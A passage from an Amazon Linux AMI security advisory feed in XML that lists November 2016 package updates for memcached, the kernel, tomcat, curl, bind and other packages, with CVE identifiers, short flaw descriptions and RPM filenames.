/><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8706:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in memcached&#039;s parsing of SASL authentication messages. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.
1390512:
CVE-2016-8706 memcached: SASL authentication remote code execution
CVE-2016-8705:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.
1390511:
CVE-2016-8705 memcached: Server update remote code execution
CVE-2016-8704:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the memcached binary protocol. An attacker could create a specially crafted message that would cause the memcached server to crash or, potentially, execute arbitrary code.
1390510:
CVE-2016-8704 memcached: Server append/prepend remote code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8704" title="" id="CVE-2016-8704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8705" title="" id="CVE-2016-8705" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8706" title="" id="CVE-2016-8706" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="memcached" version="1.4.15" release="9.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-1.4.15-9.13.amzn1.x86_64.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="9.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-devel-1.4.15-9.13.amzn1.x86_64.rpm</filename></package><package name="memcached-debuginfo" version="1.4.15" release="9.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/memcached-debuginfo-1.4.15-9.13.amzn1.x86_64.rpm</filename></package><package name="memcached" version="1.4.15" release="9.13.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-1.4.15-9.13.amzn1.i686.rpm</filename></package><package name="memcached-debuginfo" version="1.4.15" release="9.13.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-debuginfo-1.4.15-9.13.amzn1.i686.rpm</filename></package><package name="memcached-devel" version="1.4.15" release="9.13.amzn1" epoch="0" arch="i686"><filename>Packages/memcached-devel-1.4.15-9.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-762</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-762: important priority package update for kernel</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following 
vulnerabilities:
CVE-2016-8666:
The IP stack in the Linux kernel before 4.6 allows remote attackers to cause a denial of service (stack consumption and panic) or possibly have unspecified other impact by triggering use of the GRO path for packets with tunnel stacking, as demonstrated by interleaved IPv4 headers and GRE headers, a related issue to CVE-2016-7039.
1384991:
CVE-2016-8666 kernel: Remotely triggerable recursion in GRE code leading to kernel crash
CVE-2016-7039:
A Linux kernel built with the 802.1Q/802.1ad VLAN (CONFIG_VLAN_8021Q) or Virtual eXtensible Local Area Network (CONFIG_VXLAN) with Transparent Ethernet Bridging (TEB) GRO support is vulnerable to a stack overflow issue. It could occur while receiving large packets via the GRO path, as unlimited recursion could unfold in both the VLAN and TEB modules, leading to stack corruption in the kernel.
1375944:
CVE-2016-7039 kernel: remotely triggerable unbounded recursion in the vlan gro code leading to a kernel crash
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7039" title="" id="CVE-2016-7039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8666" title="" id="CVE-2016-8666" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" 
version="4.4.30" release="32.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.30-32.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.30" release="32.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.30-32.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.30" release="32.54.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.4.30-32.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-763</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-763: important priority package update for cloud-init</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cloud-init" version="0.7.6" release="2.13.amzn1" epoch="0" arch="noarch"><filename>Packages/cloud-init-0.7.6-2.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-764</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-764: important priority package update for tomcat6 tomcat7 tomcat8</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6797:
1390493:
CVE-2016-6797 tomcat: unrestricted access to global resources
CVE-2016-6796:
1390515:
CVE-2016-6796 tomcat: security manager bypass via JSP Servlet config parameters
CVE-2016-6794:
1390520:
CVE-2016-6794 tomcat: system property disclosure
CVE-2016-6325:
It was discovered that the Tomcat packages installed certain configuration files read by the Tomcat initialization script as writeable to the tomcat group. A member of the group or a malicious web application deployed on Tomcat could use this flaw to escalate their privileges.
1367447:
CVE-2016-6325 tomcat: tomcat writable config files allow privilege escalation
CVE-2016-5018:
1390525:
CVE-2016-5018 tomcat: security manager bypass via IntrospectHelper utility function
CVE-2016-0762:
1390526:
CVE-2016-0762 tomcat: timing attack in Realm implementation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0762" title="" id="CVE-2016-0762" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5018" title="" id="CVE-2016-5018" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6325" title="" id="CVE-2016-6325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6794" title="" id="CVE-2016-6794" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6796" title="" id="CVE-2016-6796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6797" title="" id="CVE-2016-6797" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-webapps" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.47" release="1.7.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat6-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.47" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.47-1.7.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.72" release="1.21.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-webapps-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.72" release="1.21.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.72-1.21.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.38" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.38-1.65.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.38" release="1.65.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.38-1.65.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-765</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-765: important priority package update for policycoreutils</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7545:
It was found that the sandbox tool provided in policycoreutils was vulnerable to a TIOCSTI ioctl attack. A specially crafted program executed via the sandbox command could use this flaw to execute arbitrary commands in the context of the parent bash, escaping the sandbox.
1378577:
CVE-2016-7545 policycoreutils: SELinux sandbox escape via TIOCSTI ioctl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7545" title="" id="CVE-2016-7545" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="policycoreutils-python" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-python-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-restorecond" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-restorecond-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-debuginfo" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-debuginfo-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-newrole" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-newrole-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils" version="2.1.12" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/policycoreutils-2.1.12-5.25.amzn1.x86_64.rpm</filename></package><package name="policycoreutils-debuginfo" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-debuginfo-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils-restorecond" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-restorecond-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils-newrole" version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-newrole-2.1.12-5.25.amzn1.i686.rpm</filename></package><package name="policycoreutils-python" 
version="2.1.12" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/policycoreutils-python-2.1.12-5.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-766</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-766: medium priority package update for curl</title><issued date="2016-11-10 18:00:00" /><updated date="2016-11-10 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8624:
1388390:
CVE-2016-8624 curl: Invalid URL parsing with '#'
CVE-2016-8623:
1388388:
CVE-2016-8623 curl: Use-after-free via shared cookies
CVE-2016-8622:
1388386:
CVE-2016-8622 curl: URL unescape heap overflow via integer truncation
CVE-2016-8621:
1388385:
CVE-2016-8621 curl: curl_getdate out-of-bounds read
CVE-2016-8620:
1388382:
CVE-2016-8620 curl: Glob parser write/read out of bounds
CVE-2016-8619:
1388379:
CVE-2016-8619 curl: Double-free in krb5 code
CVE-2016-8618:
1388378:
CVE-2016-8618 curl: Double-free in curl_maprintf
CVE-2016-8617:
1388377:
CVE-2016-8617 curl: Out-of-bounds write via unchecked multiplication
CVE-2016-8616:
1388371:
CVE-2016-8616 curl: Case insensitive password comparison
CVE-2016-8615:
1388370:
CVE-2016-8615 curl: Cookie injection for other servers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8615" title="" id="CVE-2016-8615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8616" title="" id="CVE-2016-8616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8617" title="" id="CVE-2016-8617" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8618" title="" id="CVE-2016-8618" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8619" title="" id="CVE-2016-8619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8620" title="" id="CVE-2016-8620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8621" title="" id="CVE-2016-8621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8622" title="" id="CVE-2016-8622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8623" title="" id="CVE-2016-8623" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8624" title="" id="CVE-2016-8624" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="9.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.47.1-9.66.amzn1.x86_64.rpm</filename></package><package name="libcurl" 
version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.47.1-9.66.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.47.1-9.66.amzn1.i686.rpm</filename></package><package name="curl" version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.47.1-9.66.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="9.66.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.47.1-9.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-767</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-767: medium priority package update for php-ZendFramework</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6233:
The implementation of ORDER BY and GROUP BY in Zend_Db_Select was discovered to be vulnerable to SQL injection.
CVE-2016-4861:
The implementation of ORDER BY and GROUP BY in Zend_Db_Select was discovered to be vulnerable to SQL injection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4861" title="" id="CVE-2016-4861" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6233" title="" id="CVE-2016-6233" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.20" release="1.12.amzn1" epoch="0" 
arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Pdf" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package 
name="php-ZendFramework-Ldap" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.20-1.12.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.20" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.20-1.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-768</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-768: important priority package update for bind</title><issued date="2016-11-18 12:30:00" /><updated date="2016-11-18 12:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8864:
A denial of service flaw was found in the way BIND handled responses containing a DNAME answer. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response.
1389652:
CVE-2016-8864 bind: assertion failure while handling responses containing a DNAME answer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8864" title="" id="CVE-2016-8864" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.47.rc1.51.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.47.rc1.51.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" 